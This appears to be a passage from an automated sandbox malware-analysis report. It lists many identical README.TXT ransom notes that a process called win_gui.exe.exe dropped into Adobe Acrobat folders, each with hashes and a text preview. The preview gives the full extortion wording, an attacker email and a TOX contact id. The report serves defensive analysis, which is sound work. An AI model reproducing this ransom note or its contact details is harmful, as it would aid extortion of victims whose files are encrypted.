                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\sl-si\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\sl-sl\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\sv-se\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\tr-tr\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\uk-ua\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\zh-cn\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\nls\zh-tw\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\editpdf\js\plugins\rhp\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\css\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\images\themes\dark\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ar-ae\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ca-es\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\fss\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\fss\css\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
